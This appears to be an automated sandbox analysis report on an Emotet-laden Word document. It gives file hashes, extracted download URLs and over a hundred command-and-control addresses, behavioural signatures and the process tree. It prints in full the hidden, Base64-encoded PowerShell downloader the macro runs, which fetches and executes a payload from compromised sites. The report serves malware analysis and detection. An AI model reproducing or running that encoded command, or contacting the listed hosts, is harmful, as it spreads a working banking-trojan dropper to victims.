Analysis
-
max time kernel
27s -
max time network
29s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
31-10-2020 01:16
Static task
static1
General
-
Target
8bd9939dabc1c57a46d596c9ae13646b5ca27f9a33e544c46ecfb58e729ceda4.doc
-
Size
209KB
-
MD5
74f56116f882efc1b2d432e362c84654
-
SHA1
10a00bdb8a61421f4868232ad6ea987121bd91bb
-
SHA256
8bd9939dabc1c57a46d596c9ae13646b5ca27f9a33e544c46ecfb58e729ceda4
-
SHA512
70f588d809b203b1f19f88cbf927d820b37b6bdd3358c47cfe5d7812695780f8a808d4b51fa7b90a8e88b2d25f1d11bd9620b9e696e1a39757202d5b171f8e2d
Malware Config
Extracted
http://inbichngoc.com/wp-admin/K/
http://www.angiathinh.com/autotoxication/96F/
http://www.meshzs.com/wp-includes/p6/
https://dartzeel.com/wp-content/jHy/
https://zhidong.store/wp-content/BDY/
https://australaqua.com/wp-content/xIt/
https://nurmarkaz.org/designl/u/
Extracted
emotet
Epoch1
190.202.229.74:80
118.69.11.81:7080
70.39.251.94:8080
87.230.25.43:8080
94.23.62.116:8080
37.187.161.206:8080
45.46.37.97:80
138.97.60.141:7080
177.144.130.105:8080
169.1.39.242:80
209.236.123.42:8080
202.134.4.210:7080
193.251.77.110:80
2.45.176.233:80
217.13.106.14:8080
189.223.16.99:80
190.101.156.139:80
77.238.212.227:80
181.58.181.9:80
37.183.81.217:80
74.58.215.226:80
174.118.202.24:443
168.197.45.36:80
81.215.230.173:443
192.175.111.212:7080
216.47.196.104:80
128.92.203.42:80
94.176.234.118:443
191.182.6.118:80
212.71.237.140:8080
24.232.228.233:80
177.73.0.98:443
177.23.7.151:80
24.135.69.146:80
83.169.21.32:7080
189.34.181.88:80
179.222.115.170:80
177.144.130.105:443
213.197.182.158:8080
5.89.33.136:80
77.78.196.173:443
120.72.18.91:80
50.28.51.143:8080
190.64.88.186:443
111.67.12.221:8080
12.162.84.2:8080
46.105.114.137:8080
59.148.253.194:8080
201.213.177.139:80
82.76.52.155:80
172.104.169.32:8080
188.251.213.180:80
46.43.2.95:8080
137.74.106.111:7080
188.135.15.49:80
185.94.252.27:443
197.232.36.108:80
60.249.78.226:8080
187.162.248.237:80
181.129.96.162:8080
46.101.58.37:8080
109.242.153.9:80
178.211.45.66:8080
200.59.6.174:80
83.103.179.156:80
172.86.186.21:8080
70.32.115.157:8080
81.214.253.80:443
201.49.239.200:443
149.202.72.142:7080
190.45.24.210:80
186.189.249.2:80
219.92.13.25:80
170.81.48.2:80
51.75.33.127:80
192.241.143.52:8080
45.33.77.42:8080
152.169.22.67:80
185.183.16.47:80
186.70.127.199:8090
1.226.84.243:8080
78.206.229.130:80
37.179.145.105:80
68.183.170.114:8080
192.232.229.54:7080
103.236.179.162:80
70.32.84.74:8080
79.118.74.90:80
60.93.23.51:80
181.120.29.49:80
213.52.74.198:80
51.255.165.160:8080
183.176.82.231:80
186.193.229.123:80
98.103.204.12:443
129.232.220.11:8080
181.61.182.143:80
68.183.190.199:8080
190.115.18.139:8080
200.24.255.23:80
103.13.224.53:80
85.214.26.7:8080
190.24.243.186:80
87.106.46.107:8080
177.107.79.214:8080
12.163.208.58:80
187.162.250.23:443
109.101.137.162:8080
82.76.111.249:443
181.30.61.163:443
5.196.35.138:7080
51.15.7.145:80
192.198.91.138:443
188.157.101.114:80
189.2.177.210:443
181.123.6.86:80
109.190.35.249:80
45.16.226.117:443
190.190.219.184:80
104.131.41.185:8080
101.187.81.254:80
62.84.75.50:80
178.250.54.208:8080
201.71.228.86:80
190.92.122.226:80
138.97.60.140:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POwersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 740 3288 POwersheLL.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral1/memory/3792-12-0x0000000002EB0000-0x0000000002EE4000-memory.dmp emotet behavioral1/memory/3792-13-0x0000000002EF0000-0x0000000002F23000-memory.dmp emotet behavioral1/memory/2760-16-0x0000000002880000-0x00000000028B4000-memory.dmp emotet behavioral1/memory/2760-17-0x00000000028C0000-0x00000000028F3000-memory.dmp emotet -
Blacklisted process makes network request 2 IoCs
Processes:
POwersheLL.exeflow pid process 15 740 POwersheLL.exe 17 740 POwersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
Lu7c99t.exeDsui.exepid process 3792 Lu7c99t.exe 2760 Dsui.exe -
Drops file in System32 directory 1 IoCs
Processes:
Lu7c99t.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Microsoft-Windows-MosHost\Dsui.exe Lu7c99t.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies data under HKEY_USERS 1 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey svchost.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 744 WINWORD.EXE 744 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
POwersheLL.exeDsui.exepid process 740 POwersheLL.exe 740 POwersheLL.exe 740 POwersheLL.exe 2760 Dsui.exe 2760 Dsui.exe 2760 Dsui.exe 2760 Dsui.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
POwersheLL.exedescription pid process Token: SeDebugPrivilege 740 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 744 WINWORD.EXE 744 WINWORD.EXE 744 WINWORD.EXE 744 WINWORD.EXE 744 WINWORD.EXE 744 WINWORD.EXE 744 WINWORD.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
Lu7c99t.exedescription pid process target process PID 3792 wrote to memory of 2760 3792 Lu7c99t.exe Dsui.exe PID 3792 wrote to memory of 2760 3792 Lu7c99t.exe Dsui.exe PID 3792 wrote to memory of 2760 3792 Lu7c99t.exe Dsui.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8bd9939dabc1c57a46d596c9ae13646b5ca27f9a33e544c46ecfb58e729ceda4.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:744
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -windowstyle hidden -ENCOD IAAkAG8AaABGAD0AWwB0AFkAcABFAF0AKAAiAHsAMQB9AHsAMAB9AHsANAB9AHsAMgB9AHsAMwB9ACIAIAAtAEYAJwBzACcALAAnAFMAWQAnACwAJwBlAE0ALgBpAE8ALgBEAEkAcgBlAEMAVABPACcALAAnAFIAWQAnACwAJwB0ACcAKQAgACAAOwAgACAAUwBlAFQALQBWAEEAcgBpAGEAQgBsAGUAIAAyADQAOQBOAGoAIAAoAFsAVABZAFAAZQBdACgAIgB7ADUAfQB7ADMAfQB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQAiACAALQBmACAAJwBOAGEARwBFAHIAJwAsACcALgBTAEUAcgBWACcALAAnAGkATgB0AE0AQQAnACwAJwBlAHQAJwAsACcAaQBjAGUAcABvACcALAAnAHMAWQBzAFQARQBNAC4ATgAnACkAIAAgACkAOwAgACQARwBlAHQAagA5ADMAaAA9ACgAKAAnAFIAdgAyACcAKwAnADkAdgAnACkAKwAnAHUAMQAnACkAOwAkAEMAdQA5ADQAdgAxADEAPQAkAFIAYgA2AGIAZwBxADcAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFQAZABrAGcAdwA5AGYAOwAkAEUANwB1AHEAaAByAHoAPQAoACcAQgB6ACcAKwAoACcAaQBhACcAKwAnAHQAcgB5ACcAKQApADsAIAAgACQATwBIAGYAOgA6ACIAQwByAEUAYQB0AGUAYABkAGAAaQByAGAARQBgAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAE0AJwArACgAJwBLAHgAJwArACcARABqACcAKQArACcAbAA4ACcAKwAnAHcAawAnACsAJwBvACcAKwAoACcATQBLAHgASQBhACcAKwAnADIAJwArACcAegBqAGkAJwApACsAJwBuAE0AJwArACcASwB4ACcAKQAuACIAUgBlAFAAYABMAGAAQQBDAGUAIgAoACgAWwBDAGgAQQByAF0ANwA3ACsAWwBDAGgAQQByAF0ANwA1ACsAWwBDAGgAQQByAF0AMQAyADAAKQAsAFsAcwBUAFIAaQBOAGcAXQBbAEMAaABBAHIAXQA5ADIAKQApACkAOwAkAEkAdABhAGkAbgBtADgAPQAoACcARwAnACsAJwB3ACcAKwAoACcAdAA1ACcAKwAnAHIAYQBhACcAKQApADsAIAAgACgAIABWAGEAUgBJAEEAYgBsAGUAIAAyADQAOQBOAGoAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBDAGAAVQBgAFIASQBUAHkAUAByAGAATwBUAE8AYwBPAGwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEwANgAyADEAYQBqAGEAPQAoACgAJwBJAHIAJwArACcAXwByACcAKQArACgAJwBpADYAJwArACcAbwAnACkAKQA7ACQAWQBvAHkAXwBrAHIAbgAgAD0AIAAoACcATAAnACsAKAAnAHUANwBjACcAKwAnADkAOQB0ACcAKQApADsAJABaADEAaAB2ADAANwA3AD0AKAAnAFIAcwAnACsAKAAnAHYAJwArACcAegAxADAAMgAnACkAKQA7ACQATgA0ADgANwBuAHAAdgA9ACgAKAAnAEYAJwArACcAagBvADkAJwApACsAKAAnAGYAMAAnACsAJwA1ACcAKQApADsAJABaAGwAYQA1AHIAdABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBoAGcAWgAnACsAJwBEACcAKQArACcAagAnACsAKAAnAGwAJwArACcAOAB3ACcAKQArACgAJwBrAG8AJwArACcAaAAnACkAKwAoACcAZwBaAEkAJwArACcAYQAnACkAKwAoACcAMgAnACsAJwB6AGoAaQBuACcAKwAnAGgAZwBaACcAKQApAC4AIgBSAGUAYABQAGwAQQBjAEUAIgAoACgAWwBjAEgAYQBSAF0AMQAwADQAKwBbAGMASABhAFIAXQAxADAAMwArAFsAYwBIAGEAUgBdADkAMAApACwAWwBzAHQAUgBJAG4ARwBdAFsAYwBIAGEAUgBdADkAMgApACkAKwAkAFkAbwB5AF8AawByAG4AKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAEkAOQAxAGsAYwBwAGoAPQAoACgAJwBQACcAKwAnADkANAAnACkAKwAnADIAawAnACsAJwB6AHUAJwApADsAJABYAHQAeQBsAGkAdwBkAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdAAuAHcAZQBiAEMATABJAEUATgB0ADsAJABUAHoAbAB6AGMAOQBoAD0AKAAnAGgAdAAnACsAJwB0AHAAJwArACgAJwA6AF0AWwAnACsAJwAoAHMAKQBdAHcAJwApACsAJwBdACcAKwAnAFsAJwArACgAJwAoAHMAKQAnACsAJwBdAHcAaQBuACcAKwAnAGIAaQBjACcAKwAnAGgAJwApACsAJwBuACcAKwAoACcAZwBvACcAKwAnAGMAJwApACsAKAAnAC4AJwArACcAYwBvAG0AXQAnACkAKwAoACgAJwBbACcAKwAnACgAcwAnACkAKQArACgAKAAnACkAJwArACcAXQB3AHcAcAAtACcAKwAnAGEAJwApACkAKwAoACcAZABtACcAKwAnAGkAbgAnACkAKwAoACcAXQBbACgAcwApAF0AJwArACcAdwAnACsAJwBLAF0AJwApACsAKAAoACcAWwAoACcAKQApACsAKAAoACcAcwApACcAKQApACsAJwBdACcAKwAoACcAdwAnACsAJwBAAGgAJwApACsAKAAnAHQAdAAnACsAJwBwACcAKQArACcAOgAnACsAKAAnAF0AJwArACcAWwAoAHMAKQAnACkAKwAnAF0AJwArACgAKAAnAHcAXQAnACsAJwBbACgAJwApACkAKwAnAHMAJwArACcAKQAnACsAJwBdACcAKwAnAHcAJwArACgAJwB3AHcAJwArACcAdwAnACkAKwAnAC4AJwArACcAYQAnACsAKAAnAG4AZwBpACcAKwAnAGEAdAAnACkAKwAnAGgAJwArACgAJwBpAG4AaAAnACsAJwAuAGMAbwBtAF0AWwAnACsAJwAoAHMAKQAnACkAKwAoACcAXQB3AGEAJwArACcAdQB0AG8AdABvAHgAaQAnACsAJwBjACcAKQArACcAYQB0ACcAKwAnAGkAJwArACgAJwBvAG4AJwArACcAXQAnACkAKwAoACgAJwBbACgAJwArACcAcwAnACkAKQArACgAKAAnACkAXQAnACsAJwB3ACcAKQApACsAJwA5ACcAKwAoACcANgBGACcAKwAnAF0AJwApACsAKAAnAFsAKABzACkAXQB3ACcAKwAnAEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAJwBwADoAJwArACcAXQAnACsAKAAnAFsAJwArACcAKABzACkAXQAnACkAKwAnAHcAJwArACcAXQBbACcAKwAoACgAJwAoAHMAJwApACkAKwAoACgAJwApAF0AdwAnACsAJwB3AHcAJwApACkAKwAoACcAdwAnACsAJwAuAG0AZQAnACkAKwAoACcAcwAnACsAJwBoAHoAcwAuACcAKQArACgAKAAnAGMAbwAnACsAJwBtAF0AWwAoAHMAJwApACkAKwAoACgAJwApAF0AdwAnACsAJwB3AHAALQBpAG4AYwAnACsAJwBsAHUAZAAnACsAJwBlAHMAJwApACkAKwAoACgAJwBdACcAKwAnAFsAKAAnACkAKQArACgAKAAnAHMAKQAnACkAKQArACgAJwBdACcAKwAnAHcAcAAnACkAKwAnADYAJwArACgAKAAnAF0AWwAnACsAJwAoACcAKQApACsAKAAoACcAcwApACcAKQApACsAJwBdAHcAJwArACgAJwBAAGgAJwArACcAdAB0AHAAcwAnACkAKwAnADoAXQAnACsAKAAoACcAWwAoACcAKQApACsAJwBzACcAKwAoACgAJwApAF0AJwApACkAKwAoACcAdwAnACsAJwBdAFsAKABzACkAJwArACcAXQAnACkAKwAoACcAdwBkACcAKwAnAGEAJwApACsAJwByACcAKwAoACcAdAB6ACcAKwAnAGUAZQBsACcAKQArACcALgAnACsAJwBjACcAKwAoACgAJwBvAG0AXQAnACsAJwBbACgAJwApACkAKwAoACgAJwBzACkAJwApACkAKwAoACcAXQB3AHcAcAAtAGMAJwArACcAbwAnACkAKwAoACcAbgAnACsAJwB0AGUAbgAnACsAJwB0AF0AJwArACcAWwAoAHMAKQAnACkAKwAoACcAXQB3AGoAJwArACcASAAnACkAKwAoACgAJwB5AF0AJwArACcAWwAoACcAKQApACsAJwBzACcAKwAnACkAJwArACcAXQB3ACcAKwAnAEAAJwArACcAaAB0ACcAKwAoACcAdAAnACsAJwBwAHMAJwApACsAJwA6ACcAKwAoACgAJwBdACcAKwAnAFsAKAAnACkAKQArACgAKAAnAHMAKQAnACsAJwBdAHcAJwApACkAKwAoACgAJwBdAFsAJwArACcAKAAnACkAKQArACgAKAAnAHMAKQAnACkAKQArACcAXQB3ACcAKwAoACcAegAnACsAJwBoAGkAZAAnACkAKwAoACcAbwAnACsAJwBuAGcALgBzACcAKQArACgAJwB0AG8AcgAnACsAJwBlAF0AWwAoAHMAJwArACcAKQBdACcAKwAnAHcAJwApACsAJwB3AHAAJwArACgAJwAtAGMAbwBuACcAKwAnAHQAJwArACcAZQBuAHQAJwApACsAKAAnAF0AJwArACcAWwAoAHMAKQAnACsAJwBdACcAKQArACgAJwB3ACcAKwAnAEIARABZAF0AWwAnACkAKwAnACgAJwArACgAKAAnAHMAKQAnACsAJwBdAHcAJwApACkAKwAnAEAAaAAnACsAJwB0AHQAJwArACcAcABzACcAKwAoACgAJwA6AF0AWwAnACsAJwAoAHMAJwApACkAKwAoACgAJwApAF0AdwAnACsAJwBdAFsAKAAnACsAJwBzACkAXQAnACkAKQArACcAdwBhACcAKwAnAHUAJwArACcAcwAnACsAKAAnAHQAcgAnACsAJwBhAGwAJwApACsAKAAoACcAYQBxAHUAYQAuACcAKwAnAGMAbwAnACsAJwBtAF0AWwAnACsAJwAoACcAKQApACsAKAAoACcAcwApAF0AdwAnACsAJwB3AHAAJwArACcALQBjAG8AJwApACkAKwAoACcAbgB0AGUAbgB0ACcAKwAnAF0AJwApACsAJwBbACcAKwAoACcAKABzACcAKwAnACkAXQB3AHgASQB0AF0AWwAoAHMAKQBdAHcAQABoACcAKwAnAHQAdAAnACsAJwBwAHMAOgBdACcAKwAnAFsAJwApACsAKAAnACgAJwArACcAcwApAF0AdwBdACcAKQArACgAJwBbACcAKwAnACgAcwApAF0AJwApACsAJwB3AG4AJwArACcAdQByACcAKwAoACcAbQBhACcAKwAnAHIAJwApACsAKAAnAGsAYQB6AC4AJwArACcAbwAnACkAKwAoACcAcgAnACsAJwBnAF0AJwApACsAJwBbACcAKwAnACgAJwArACgAKAAnAHMAKQAnACkAKQArACcAXQB3ACcAKwAnAGQAZQAnACsAJwBzACcAKwAnAGkAJwArACgAJwBnACcAKwAnAG4AbABdACcAKQArACgAJwBbACcAKwAnACgAcwApACcAKQArACcAXQAnACsAKAAnAHcAdQBdACcAKwAnAFsAJwApACsAJwAoACcAKwAoACgAJwBzACkAJwApACkAKwAnAF0AdwAnACkALgAiAFIAYABlAGAAUABMAGEAQwBFACIAKAAoACgAKAAnAF0AWwAnACsAJwAoAHMAJwApACkAKwAoACgAJwApAF0AJwArACcAdwAnACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwB4AHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBzAGAAUABMAEkAdAAiACgAJABVADUAdABlAGIAeAByACAAKwAgACQAQwB1ADkANAB2ADEAMQAgACsAIAAkAEQANABuAHoAcgA5ADgAKQA7ACQAUgBjAG4ANABpAHEAXwA9ACgAKAAnAE8AcQAnACsAJwBrACcAKQArACgAJwBwAHcANgAnACsAJwBlACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABPAHcAdgAxAG8AagBvACAAaQBuACAAJABUAHoAbAB6AGMAOQBoACkAewB0AHIAeQB7ACQAWAB0AHkAbABpAHcAZAAuACIARABgAG8AdwBOAEwATwBgAEEARABGAGkAYABMAGUAIgAoACQATwB3AHYAMQBvAGoAbwAsACAAJABaAGwAYQA1AHIAdABuACkAOwAkAFIAOABmAGwAcAAxAHIAPQAoACgAJwBMAGcAZgAnACsAJwBqACcAKQArACgAJwBiACcAKwAnAHYAXwAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABaAGwAYQA1AHIAdABuACkALgAiAEwARQBOAGAARwB0AEgAIgAgAC0AZwBlACAANAAzADAANwA4ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwAnACsAKAAnAGkAbgAzADIAJwArACcAXwBQAHIAJwArACcAbwBjAGUAJwApACsAJwBzACcAKwAnAHMAJwApACkALgAiAGMAYABSAEUAYQB0AEUAIgAoACQAWgBsAGEANQByAHQAbgApADsAJABDAGMAaQBtADMAawBtAD0AKAAnAEwAJwArACgAJwB2AHYAJwArACcAbQBjACcAKQArACcAMABrACcAKQA7AGIAcgBlAGEAawA7ACQAVgBhAHYANAB2AGsAMAA9ACgAJwBSAG4AJwArACcAYgAnACsAKAAnAGwAMQAnACsAJwBiAF8AJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAbgB0ADQAOABoADkAPQAoACgAJwBVAHMAJwArACcAXwAnACkAKwAoACcAZgA3ACcAKwAnAG4AbgAnACkAKQA=1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:740
-
C:\Users\Admin\Djl8wko\Ia2zjin\Lu7c99t.exeC:\Users\Admin\Djl8wko\Ia2zjin\Lu7c99t.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Windows\SysWOW64\Microsoft-Windows-MosHost\Dsui.exe"C:\Windows\SysWOW64\Microsoft-Windows-MosHost\Dsui.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2760
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc1⤵PID:1236
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService1⤵PID:204
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc1⤵
- Modifies data under HKEY_USERS
PID:3940
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8846e4b6fa9202bf962b3a7da791e970
SHA19219f32bec1ca332068065d622dfd50e51536677
SHA2569d2aa2c701aa9a80af2fa02164ff7d0d604f2c37b3967189df9e7cf973768632
SHA512bc69e73bb26e69af190f867d213cf107d39c65c8db714859b287ba04a528b30c329ed4f43c95e43183bab23cdb9ad4acf48ad28be3c59505ea05bfba26c273bf
-
MD5
8846e4b6fa9202bf962b3a7da791e970
SHA19219f32bec1ca332068065d622dfd50e51536677
SHA2569d2aa2c701aa9a80af2fa02164ff7d0d604f2c37b3967189df9e7cf973768632
SHA512bc69e73bb26e69af190f867d213cf107d39c65c8db714859b287ba04a528b30c329ed4f43c95e43183bab23cdb9ad4acf48ad28be3c59505ea05bfba26c273bf
-
MD5
8846e4b6fa9202bf962b3a7da791e970
SHA19219f32bec1ca332068065d622dfd50e51536677
SHA2569d2aa2c701aa9a80af2fa02164ff7d0d604f2c37b3967189df9e7cf973768632
SHA512bc69e73bb26e69af190f867d213cf107d39c65c8db714859b287ba04a528b30c329ed4f43c95e43183bab23cdb9ad4acf48ad28be3c59505ea05bfba26c273bf